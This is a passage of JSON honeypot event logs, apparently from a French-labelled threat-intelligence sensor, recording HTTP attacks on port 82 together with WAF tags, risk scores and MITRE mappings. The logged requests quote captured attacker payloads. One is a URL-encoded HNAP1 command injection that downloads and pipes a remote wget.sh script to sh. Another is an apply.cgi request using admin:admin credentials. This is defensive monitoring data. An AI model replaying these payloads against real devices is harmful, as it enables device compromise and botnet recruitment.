\u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dhna\u2026\u0022, \u0022request_line\u0022: \u0022GET \/HNAP1\/GetDeviceSettings\/%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bcurl%20http:\/\/91.92.4\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20w\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/HNAP1\/GetDeviceSettings\/%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20wget%20http:\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 13 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 13 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950308:lfi-12\u0022, \u0022950310:lfi-12\u0022, \u0022950324:rce-0\u0022, \u0022950326:rce-0\u0022, \u0022950332:rce-2\u0022, \u0022950334:rce-2\u0022, \u0022950344:rce-5\u0022, \u0022950346:rce-5\u0022, \u0022950404:ssrf-3\u0022, \u0022950406:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950486:redir-1\u0022, \u0022http_no_ua\u0022, \u0022iot_http_endpoint\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950308:lfi-12\u0022, \u0022950310:lfi-12\u0022, \u0022950324:rce-0\u0022, \u0022950326:rce-0\u0022, \u0022950332:rce-2\u0022, \u0022950334:rce-2\u0022, \u0022950344:rce-5\u0022, \u0022950346:rce-5\u0022, \u0022950404:ssrf-3\u0022, \u0022950406:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950486:redir-1\u0022, \u0022http_no_ua\u0022, \u0022iot_http_endpoint\u0022]","anomalies":"[]","severity":10,"bytes_in":556},{"id":11809367,"ip":"45.153.34.219","ts":"2026-07-14 02:18:14.000000","proto":"tcp","src_port":55340,"dst_port":82,"service":"http","classification":"config_file_probe","waf_score":0,"waf_tags":"[]","http_method":"POST","http_target":"\/login.cgi","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u00225d1c064d8f41c9821d75c9116650ed5db6a1a5ee\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 136, \u0022payload_entropy\u0022: 4.981728421014827, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 8.0, \u0022risk_classification\u0022: 74.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 15.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 4.6, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 8.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 15.0}, \u0022risk_score\u0022: 46, \u0022tag_count\u0022: 4, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00226b929ef1abe54f6a762ddff908d7b629b6fab459\u0022, \u0022event_fingerprint\u0022: \u0022a349f3eadbd1cd36dae0598446e9927ff6c6031c\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 Correspondance tags WAF \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 97%\u0022, \u0022confidence\u0022: 0.97, \u0022classification_confidence\u0022: 0.97, \u0022precision_score\u0022: 97, \u0022precision_signals\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 8.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 15.0, \u0022risk_score\u0022: 46}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022backup_file_scan\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 97.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022946966fa5809afcce1ee230cf431636e\u0022, \u0022path_pattern_hash\u0022: \u0022f6e9baaa731f11923b2ba9541a8713d5\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 46}, \u0022payload_preview\u0022: \u0022POST \/login.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 0\\r\\nConnection: c\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/login.cgi\u0022, \u0022request_line\u0022: \u0022POST \/login.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/login.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 0\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022payload_snippet\u0022: \u0022POST \/login.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 0\\r\\nConnection: c\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/login.cgi\u0022, \u0022request_line\u0022: \u0022POST \/login.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/login.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 0\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022payload_snippet\u0022: \u0022POST \/login.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 0\\r\\nConnection: c\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 Correspondance tags WAF \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 97%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1083\u0022], \u0022mitre\u0022: \u0022T1083\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022, \u0022config_leak_scan\u0022], \u0022recommended_client_action\u0022: \u0022monitor\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u002207e364ffd67e979651ada82597770f44a8fed8dc\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/login.cgi\u0022, \u0022request_line\u0022: \u0022POST \/login.cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/login.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 0\\r\\nConnection: c\u0022, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/login.cgi\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 97 % \u2014 4 signal(aux) capteur\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 Correspondance tags WAF \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 97%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 Correspondance tags WAF \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 97%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 46\/100 (Moyen) \u2014 MITRE T1083 \u2014 confiance 97 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 97, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 8.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 15.0, \u0022risk_score\u0022: 46}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 46, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Sensitive\u0022, \u0022Upstream\u0022], \u0022recommended_action\u0022: \u0022monitor\u0022, \u0022recommended_action_label\u0022: \u0022Surveiller\u0022, \u0022mitre\u0022: \u0022T1083\u0022, \u0022mitre_technique\u0022: \u0022T1083\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/login.cgi\u0022, \u0022request_line\u0022: \u0022POST \/login.cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/login.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/login.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 0\\r\\nConnection: c\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 97 % \u2014 4 signal(aux) capteur\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 97 % \u2014 Score WAF 8\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_monitor\u0022, \u0022tags_list\u0022: [\u0022http_no_ua\u0022, \u0022http_probe_login\u0022, \u0022http_sensitive_path\u0022, \u0022iot_http_endpoint\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022http_no_ua\u0022, \u0022http_probe_login\u0022, \u0022http_sensitive_path\u0022, \u0022iot_http_endpoint\u0022]","anomalies":"[]","severity":7,"bytes_in":136},{"id":11809353,"ip":"45.153.34.219","ts":"2026-07-14 02:18:13.000000","proto":"tcp","src_port":55202,"dst_port":82,"service":"http","classification":"cmd_injection","waf_score":34,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/apply.cgi","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 5, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u002231402cc48ac7ac052e1d50fc94349665a12c2c45\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 529, \u0022payload_entropy\u0022: 5.36769474812175, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 11, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00224a83991c6cb900d0fb00b4b6aafa98c9742d42ef\u0022, \u0022event_fingerprint\u0022: \u00226b2c5ff3085684c662d172d85fc6520b04bcf832\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 142, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0463\u0022, \u0022pat-0146\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022Cred Basic auth spray\u0022, \u0022CRS 932205\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0463\u0022, \u0022pat-0146\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022c7a41a0adc120a11210e87092e2fe67b\u0022, \u0022path_pattern_hash\u0022: \u0022b3e1dfd605a877958cebee595444f5d1\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 352\\r\\nConnection: close\\r\\n\\r\\nsubmit_button=Diagnostics\u0026change_action=gozila_cgi\u0026submit_type=start_traceroute\u0022, \u0022payload_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 352\\r\\nConnection: close\\r\\n\\r\\nsubmit_button=Diagnostics\u0026change_action=gozila_cgi\u0026submit_type=start_traceroute\u0022, \u0022payload_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022e246b368154ccb48fb549d5f7f4a7591a445329c\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/apply.cgi\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/apply.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 5 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: 